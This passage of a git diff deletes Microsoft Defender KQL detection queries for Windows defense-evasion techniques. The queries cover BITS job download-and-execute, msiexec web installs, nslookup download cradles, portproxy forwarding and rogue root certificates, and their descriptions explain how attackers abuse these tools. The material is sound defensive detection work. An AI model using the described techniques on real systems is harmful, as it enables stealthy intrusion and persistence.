specified in the BITS job will be executed. -This can be abused by actors to create a backdoor within the system and for persistence. -It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded. - -// Tags: attack.defense_evasion, attack.t1197 -DeviceProcessEvents -| where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and ((ProcessCommandLine contains "/SetNotifyCmdLine" and (ProcessCommandLine contains "%COMSPEC%" or ProcessCommandLine contains "cmd.exe" or ProcessCommandLine contains "regsvr32.exe")) or (ProcessCommandLine contains "/Addfile" and (ProcessCommandLine contains "http:" or ProcessCommandLine contains "https:" or ProcessCommandLine contains "ftp:" or ProcessCommandLine contains "ftps:"))) \ No newline at end of file diff --git a/Defense Evasion/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql b/Defense Evasion/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql deleted file mode 100644 index 3f152c7d..00000000 --- a/Defense Evasion/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA) -// Date: 2022/08/14 -// Level: high -// Description: Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...) - -// Tags: attack.defense_evasion, attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains "#135" or ProcessCommandLine contains "RunHTMLApplication") and (ProcessCommandLine contains "\\..\\" and ProcessCommandLine contains "mshtml") \ No newline at end of file diff --git a/Defense Evasion/MsiExec_Web_Install.kql b/Defense Evasion/MsiExec_Web_Install.kql deleted file mode 100644 index 15d8a634..00000000 --- a/Defense Evasion/MsiExec_Web_Install.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2018/02/09 -// Level: medium -// Description: Detects suspicious msiexec process starts with web addresses as parameter -// Tags: attack.defense_evasion, attack.t1218.007, attack.command_and_control, attack.t1105 -DeviceProcessEvents -| where ProcessCommandLine contains " msiexec" and ProcessCommandLine contains "://" \ No newline at end of file diff --git a/Defense Evasion/Msiexec_Quiet_Installation.kql b/Defense Evasion/Msiexec_Quiet_Installation.kql deleted file mode 100644 index e47c0886..00000000 --- a/Defense Evasion/Msiexec_Quiet_Installation.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2022/01/16 -// Level: medium -// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. -Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) - -// Tags: attack.defense_evasion, attack.t1218.007 -DeviceProcessEvents -| where ((ProcessCommandLine contains "-i" or ProcessCommandLine contains "/i" or ProcessCommandLine contains "-package" or ProcessCommandLine contains "/package" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "-j" or ProcessCommandLine contains "/j") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "msiexec.exe") and (ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q")) and (not(((ProcessIntegrityLevel =~ "System" and InitiatingProcessFolderPath =~ "C:\\Windows\\CCM\\Ccm32BitLauncher.exe") or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath startswith "C:\\Users\\")))) \ No newline at end of file diff --git a/Defense Evasion/Msxsl.EXE_Execution.kql b/Defense Evasion/Msxsl.EXE_Execution.kql deleted file mode 100644 index 5adad169..00000000 --- a/Defense Evasion/Msxsl.EXE_Execution.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Timur Zinniatullin, oscd.community -// Date: 2019/10/21 -// Level: medium -// Description: Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. -Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. - -// Tags: attack.defense_evasion, attack.t1220 -DeviceProcessEvents -| where FolderPath endswith "\\msxsl.exe" \ No newline at end of file diff --git a/Defense Evasion/NET_NGenAssemblyUsageLog_Registry_Key_Tamper.kql b/Defense Evasion/NET_NGenAssemblyUsageLog_Registry_Key_Tamper.kql deleted file mode 100644 index fd8baf44..00000000 --- a/Defense Evasion/NET_NGenAssemblyUsageLog_Registry_Key_Tamper.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2022/11/18 -// Level: high -// Description: Detects changes to the NGenAssemblyUsageLog registry key. -.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). -By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created. - -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryKey endswith "SOFTWARE\\Microsoft\\.NETFramework\\NGenAssemblyUsageLog" \ No newline at end of file diff --git a/Defense Evasion/NetNTLM_Downgrade_Attack_-_Registry.kql b/Defense Evasion/NetNTLM_Downgrade_Attack_-_Registry.kql deleted file mode 100644 index 016f8720..00000000 --- a/Defense Evasion/NetNTLM_Downgrade_Attack_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), wagga -// Date: 2018/03/20 -// Level: high -// Description: Detects NetNTLM downgrade attack -// Tags: attack.defense_evasion, attack.t1562.001, attack.t1112 -DeviceRegistryEvents -| where (RegistryKey contains "SYSTEM" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Control\\Lsa") and (RegistryKey endswith "\\lmcompatibilitylevel" or RegistryKey endswith "\\NtlmMinClientSec" or RegistryKey endswith "\\RestrictSendingNTLMTraffic") \ No newline at end of file diff --git a/Defense Evasion/Netsh_Allow_Group_Policy_on_Microsoft_Defender_Firewall.kql b/Defense Evasion/Netsh_Allow_Group_Policy_on_Microsoft_Defender_Firewall.kql deleted file mode 100644 index fa2fb1a9..00000000 --- a/Defense Evasion/Netsh_Allow_Group_Policy_on_Microsoft_Defender_Firewall.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/09 -// Level: medium -// Description: Adversaries may modify system firewalls in order to bypass controls limiting network usage -// Tags: attack.defense_evasion, attack.t1562.004 -DeviceProcessEvents -| where (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "firewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "rule" and ProcessCommandLine contains "group=" and ProcessCommandLine contains "new" and ProcessCommandLine contains "enable=Yes") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/Defense Evasion/Network_Connection_Initiated_By_AddinUtil.EXE.kql b/Defense Evasion/Network_Connection_Initiated_By_AddinUtil.EXE.kql deleted file mode 100644 index 36f8079b..00000000 --- a/Defense Evasion/Network_Connection_Initiated_By_AddinUtil.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) -// Date: 2023/09/18 -// Level: medium -// Description: Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". -This could indicate a potential command and control communication as this tool doesn't usually initiate network activity. - -// Tags: attack.defense_evasion, attack.t1218 -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith "\\addinutil.exe" \ No newline at end of file diff --git a/Defense Evasion/Network_Connection_Initiated_By_Regsvr32.EXE.kql b/Defense Evasion/Network_Connection_Initiated_By_Regsvr32.EXE.kql deleted file mode 100644 index fece3237..00000000 --- a/Defense Evasion/Network_Connection_Initiated_By_Regsvr32.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Dmitriy Lifanov, oscd.community -// Date: 2019/10/25 -// Level: medium -// Description: Detects a network connection initiated by "Regsvr32.exe" -// Tags: attack.execution, attack.t1559.001, attack.defense_evasion, attack.t1218.010 -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith "\\regsvr32.exe" \ No newline at end of file diff --git a/Defense Evasion/Network_Connection_Initiated_Via_Notepad.EXE.kql b/Defense Evasion/Network_Connection_Initiated_Via_Notepad.EXE.kql deleted file mode 100644 index 8e765072..00000000 --- a/Defense Evasion/Network_Connection_Initiated_Via_Notepad.EXE.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: EagleEye Team -// Date: 2020/05/14 -// Level: high -// Description: Detects a network connection that is initiated by the "notepad.exe" process. -This might be a sign of process injection from a beacon process or something similar. -Notepad rarely initiates a network communication except when printing documents for example. - -// Tags: attack.command_and_control, attack.execution, attack.defense_evasion, attack.t1055 -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith "\\notepad.exe" and (not(RemotePort == 9100)) \ No newline at end of file diff --git a/Defense Evasion/New_BgInfo.EXE_Custom_DB_Path_Registry_Configuration.kql b/Defense Evasion/New_BgInfo.EXE_Custom_DB_Path_Registry_Configuration.kql deleted file mode 100644 index 1b6b673e..00000000 --- a/Defense Evasion/New_BgInfo.EXE_Custom_DB_Path_Registry_Configuration.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/16 -// Level: medium -// Description: Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information. -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where ActionType =~ "RegistryValueSet" and RegistryKey endswith "\\Software\\Winternals\\BGInfo\\Database" \ No newline at end of file diff --git a/Defense Evasion/New_BgInfo.EXE_Custom_VBScript_Registry_Configuration.kql b/Defense Evasion/New_BgInfo.EXE_Custom_VBScript_Registry_Configuration.kql deleted file mode 100644 index ec618a77..00000000 --- a/Defense Evasion/New_BgInfo.EXE_Custom_VBScript_Registry_Configuration.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/16 -// Level: medium -// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe" -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryValueData startswith "4" and ActionType =~ "RegistryValueSet" and RegistryKey contains "\\Software\\Winternals\\BGInfo\\UserFields" \ No newline at end of file diff --git a/Defense Evasion/New_BgInfo.EXE_Custom_WMI_Query_Registry_Configuration.kql b/Defense Evasion/New_BgInfo.EXE_Custom_WMI_Query_Registry_Configuration.kql deleted file mode 100644 index 24312dbc..00000000 --- a/Defense Evasion/New_BgInfo.EXE_Custom_WMI_Query_Registry_Configuration.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/16 -// Level: medium -// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe" -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryValueData startswith "6" and ActionType =~ "RegistryValueSet" and RegistryKey contains "\\Software\\Winternals\\BGInfo\\UserFields" \ No newline at end of file diff --git a/Defense Evasion/New_DLL_Registered_Via_Odbcconf.EXE.kql b/Defense Evasion/New_DLL_Registered_Via_Odbcconf.EXE.kql deleted file mode 100644 index bc970aa2..00000000 --- a/Defense Evasion/New_DLL_Registered_Via_Odbcconf.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/22 -// Level: medium -// Description: Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs. -// Tags: attack.defense_evasion, attack.t1218.008 -DeviceProcessEvents -| where (ProcessCommandLine contains "REGSVR " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe") \ No newline at end of file diff --git a/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed.kql b/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed.kql deleted file mode 100644 index 1fa50c1c..00000000 --- a/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2017/05/08 -// Level: high -// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) -// Tags: attack.defense_evasion, attack.t1574.002, attack.t1112 -DeviceRegistryEvents -| where RegistryKey endswith "\\services\\DNS\\Parameters\\ServerLevelPluginDll" \ No newline at end of file diff --git a/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed_Via_Dnscmd.EXE.kql b/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed_Via_Dnscmd.EXE.kql deleted file mode 100644 index 13f2830a..00000000 --- a/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed_Via_Dnscmd.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2017/05/08 -// Level: high -// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) -// Tags: attack.defense_evasion, attack.t1574.002, attack.t1112 -DeviceProcessEvents -| where (ProcessCommandLine contains "/config" and ProcessCommandLine contains "/serverlevelplugindll") and FolderPath endswith "\\dnscmd.exe" \ No newline at end of file diff --git a/Defense Evasion/New_File_Association_Using_Exefile.kql b/Defense Evasion/New_File_Association_Using_Exefile.kql deleted file mode 100644 index 51ab4c8a..00000000 --- a/Defense Evasion/New_File_Association_Using_Exefile.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades) -// Date: 2021/11/19 -// Level: high -// Description: Detects the abuse of the exefile handler in new file association. Used for bypass of security products. -// Tags: attack.defense_evasion -DeviceRegistryEvents -| where RegistryValueData =~ "exefile" and RegistryKey contains "Classes\\." \ No newline at end of file diff --git a/Defense Evasion/New_Firewall_Rule_Added_Via_Netsh.EXE.kql b/Defense Evasion/New_Firewall_Rule_Added_Via_Netsh.EXE.kql deleted file mode 100644 index 0e1275cd..00000000 --- a/Defense Evasion/New_Firewall_Rule_Added_Via_Netsh.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Markus Neis, Sander Wiebing -// Date: 2019/01/29 -// Level: medium -// Description: Detects the addition of a new rule to the Windows firewall via netsh -// Tags: attack.defense_evasion, attack.t1562.004, attack.s0246 -DeviceProcessEvents -| where ((ProcessCommandLine contains " firewall " and ProcessCommandLine contains " add ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")) and (not(((ProcessCommandLine contains "advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=" and ProcessCommandLine contains ":\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any") or (ProcessCommandLine contains "advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=" and ProcessCommandLine contains ":\\Program Files\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any")))) \ No newline at end of file diff --git a/Defense Evasion/New_PortProxy_Registry_Entry_Added.kql b/Defense Evasion/New_PortProxy_Registry_Entry_Added.kql deleted file mode 100644 index edd848c1..00000000 --- a/Defense Evasion/New_PortProxy_Registry_Entry_Added.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades) -// Date: 2021/06/22 -// Level: medium -// Description: Detects the modification of the PortProxy registry key which is used for port forwarding. -// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090 -DeviceRegistryEvents -| where RegistryKey contains "\\Services\\PortProxy\\v4tov4\\tcp" \ No newline at end of file diff --git a/Defense Evasion/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql b/Defense Evasion/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql deleted file mode 100644 index bde86a78..00000000 --- a/Defense Evasion/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel -// Date: 2019/01/29 -// Level: medium -// Description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule -// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090 -DeviceProcessEvents -| where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "interface" and ProcessCommandLine contains "portproxy" and ProcessCommandLine contains "add" and ProcessCommandLine contains "v4tov4") or (ProcessCommandLine contains "i " and ProcessCommandLine contains "p " and ProcessCommandLine contains "a " and ProcessCommandLine contains "v ") or (ProcessCommandLine contains "connectp" and ProcessCommandLine contains "listena" and ProcessCommandLine contains "c=")) \ No newline at end of file diff --git a/Defense Evasion/New_Process_Created_Via_Taskmgr.EXE.kql b/Defense Evasion/New_Process_Created_Via_Taskmgr.EXE.kql deleted file mode 100644 index c6f79160..00000000 --- a/Defense Evasion/New_Process_Created_Via_Taskmgr.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2018/03/13 -// Level: low -// Description: Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC -// Tags: attack.defense_evasion, attack.t1036 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\taskmgr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\resmon.exe" or FolderPath endswith ":\\Windows\\System32\\Taskmgr.exe"))) \ No newline at end of file diff --git a/Defense Evasion/New_Root_Certificate_Installed_Via_CertMgr.EXE.kql b/Defense Evasion/New_Root_Certificate_Installed_Via_CertMgr.EXE.kql deleted file mode 100644 index 4cc604ab..00000000 --- a/Defense Evasion/New_Root_Certificate_Installed_Via_CertMgr.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: oscd.community, @redcanary, Zach Stanford @svch0st -// Date: 2023/03/05 -// Level: medium -// Description: Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system. -Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. - -// Tags: attack.defense_evasion, attack.t1553.004 -DeviceProcessEvents -| where (ProcessCommandLine contains "/add" and ProcessCommandLine contains "root") and (FolderPath endswith "\\CertMgr.exe" or ProcessVersionInfoOriginalFileName =~ "CERTMGT.EXE") \ No newline at end of file diff --git a/Defense Evasion/New_Root_Certificate_Installed_Via_Certutil.EXE.kql b/Defense Evasion/New_Root_Certificate_Installed_Via_Certutil.EXE.kql deleted file mode 100644 index 39fd1adb..00000000 --- a/Defense Evasion/New_Root_Certificate_Installed_Via_Certutil.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: oscd.community, @redcanary, Zach Stanford @svch0st -// Date: 2023/03/05 -// Level: medium -// Description: Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system. -Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. - -// Tags: attack.defense_evasion, attack.t1553.004 -DeviceProcessEvents -| where (ProcessCommandLine contains "-addstore" or ProcessCommandLine contains "/addstore") and ProcessCommandLine contains "root" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/Defense Evasion/Node_Process_Executions.kql b/Defense Evasion/Node_Process_Executions.kql deleted file mode 100644 index 317037be..00000000 --- a/Defense Evasion/Node_Process_Executions.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Max Altgelt (Nextron Systems) -// Date: 2022/04/06 -// Level: medium -// Description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud -// Tags: attack.defense_evasion, attack.t1127, attack.t1059.007 -DeviceProcessEvents -| where FolderPath endswith "\\Adobe Creative Cloud Experience\\libs\\node.exe" and (not(ProcessCommandLine contains "Adobe Creative Cloud Experience\\js")) \ No newline at end of file diff --git a/Defense Evasion/Non-privileged_Usage_of_Reg_or_Powershell.kql b/Defense Evasion/Non-privileged_Usage_of_Reg_or_Powershell.kql deleted file mode 100644 index 80c08589..00000000 --- a/Defense Evasion/Non-privileged_Usage_of_Reg_or_Powershell.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community -// Date: 2020/10/05 -// Level: high -// Description: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry -// Tags: attack.defense_evasion, attack.t1112 -DeviceProcessEvents -| where ((ProcessCommandLine contains "reg " and ProcessCommandLine contains "add") or (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "set-itemproperty" or ProcessCommandLine contains " sp " or ProcessCommandLine contains "new-itemproperty")) and ((ProcessCommandLine contains "ImagePath" or ProcessCommandLine contains "FailureCommand" or ProcessCommandLine contains "ServiceDLL") and (ProcessCommandLine contains "ControlSet" and ProcessCommandLine contains "Services") and ProcessIntegrityLevel =~ "Medium") \ No newline at end of file diff --git a/Defense Evasion/Nslookup_PowerShell_Download_Cradle_-_ProcessCreation.kql b/Defense Evasion/Nslookup_PowerShell_Download_Cradle_-_ProcessCreation.kql deleted file mode 100644 index b0dfafe0..00000000 --- a/Defense Evasion/Nslookup_PowerShell_Download_Cradle_-_ProcessCreation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/05 -// Level: medium -// Description: Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records -// Tags: attack.defense_evasion -DeviceProcessEvents -| where ((ProcessCommandLine contains " -q=txt " or ProcessCommandLine contains " -querytype=txt ") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (FolderPath contains "\\nslookup.exe" or ProcessVersionInfoOriginalFileName =~ "\\nslookup.exe") \ No newline at end of file diff --git a/Defense Evasion/NtdllPipe_Like_Activity_Execution.kql b/Defense Evasion/NtdllPipe_Like_Activity_Execution.kql deleted file mode 100644 index 97bb7aff..00000000 --- a/Defense Evasion/NtdllPipe_Like_Activity_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/03/05 -// Level: high -// Description: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe -// Tags: attack.defense_evasion -DeviceProcessEvents -| where ProcessCommandLine contains "type %windir%\\system32\\ntdll.dll" or ProcessCommandLine contains "type %systemroot%\\system32\\ntdll.dll" or ProcessCommandLine contains "type c:\\windows\\system32\\ntdll.dll" or ProcessCommandLine contains "\\ntdll.dll > \\\\.\\pipe\\" \ No newline at end of file diff --git a/Defense Evasion/OceanLotus_Registry_Activity.kql b/Defense Evasion/OceanLotus_Registry_Activity.kql deleted file mode 100644 index af20c10a..00000000 --- a/Defense Evasion/OceanLotus_Registry_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: megan201296, Jonhnathan Ribeiro -// Date: 2019/04/14 -// Level: critical -// Description: Detects registry keys created in OceanLotus (also known as APT32) attacks -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryKey contains "\\SOFTWARE\\Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model" or (RegistryKey contains "Classes\\AppXc52346ec40fb4061ad96be0e6cb7d16a" or RegistryKey contains "Classes\\AppX3bbba44c6cae4d9695755183472171e2" or RegistryKey contains "Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B}" or RegistryKey contains "Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model") or (RegistryKey contains "\\SOFTWARE\\App" and ((RegistryKey contains "AppXbf13d4ea2945444d8b13e2121cb6b663" or RegistryKey contains "AppX70162486c7554f7f80f481985d67586d" or RegistryKey contains "AppX37cc7fdccd644b4f85f4b22d5a3f105a") and (RegistryKey endswith "Application" or RegistryKey endswith "DefaultIcon"))) \ No newline at end of file diff --git a/Defense Evasion/Odbcconf.EXE_Suspicious_DLL_Location.kql b/Defense Evasion/Odbcconf.EXE_Suspicious_DLL_Location.kql deleted file mode 100644 index 6707a71e..00000000 --- a/Defense Evasion/Odbcconf.EXE_Suspicious_DLL_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/22 -// Level: high -// Description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location. -// Tags: attack.defense_evasion, attack.t1218.008 -DeviceProcessEvents -| where (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Registration\\CRMLog" or ProcessCommandLine contains ":\\Windows\\System32\\com\\dmp\\" or ProcessCommandLine contains ":\\Windows\\System32\\FxsTmp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\drivers\\color\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\PRINTERS\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\SERVERS\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks_Migrated\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\com\\dmp\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\FxsTmp\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Tracing\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe") \ No newline at end of file diff --git a/Defense Evasion/Office_Macros_Warning_Disabled.kql b/Defense Evasion/Office_Macros_Warning_Disabled.kql deleted file mode 100644 index e452118e..00000000 --- a/Defense Evasion/Office_Macros_Warning_Disabled.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/05/22 -// Level: high -// Description: Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned. -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Security\\VBAWarnings" \ No newline at end of file diff --git a/Defense Evasion/OilRig_APT_Registry_Persistence.kql b/Defense Evasion/OilRig_APT_Registry_Persistence.kql deleted file mode 100644 index 83beccff..00000000 --- a/Defense Evasion/OilRig_APT_Registry_Persistence.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community -// Date: 2018/03/23 -// Level: critical -// Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report -// Tags: attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense_evasion, attack.t1112, attack.command_and_control, attack.t1071.004 -DeviceRegistryEvents -| where RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT" \ No newline at end of file diff --git a/Defense Evasion/OneNote_Attachment_File_Dropped_In_Suspicious_Location.kql b/Defense Evasion/OneNote_Attachment_File_Dropped_In_Suspicious_Location.kql deleted file mode 100644 index 3ec39e0a..00000000 --- a/Defense Evasion/OneNote_Attachment_File_Dropped_In_Suspicious_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/22 -// Level: medium -// Description: Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments -// Tags: attack.defense_evasion -DeviceFileEvents -| where ((FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\") and (FolderPath endswith ".one" or FolderPath endswith ".onepkg")) and (not((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" and InitiatingProcessFolderPath endswith "\\ONENOTE.EXE"))) \ No newline at end of file diff --git a/Defense Evasion/OpenWith.exe_Executes_Specified_Binary.kql b/Defense Evasion/OpenWith.exe_Executes_Specified_Binary.kql deleted file mode 100644 index 5a82e930..00000000 --- a/Defense Evasion/OpenWith.exe_Executes_Specified_Binary.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Beyu Denis, oscd.community (rule), @harr0ey (idea) -// Date: 2019/10/12 -// Level: high -// Description: The OpenWith.exe executes other binary -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where 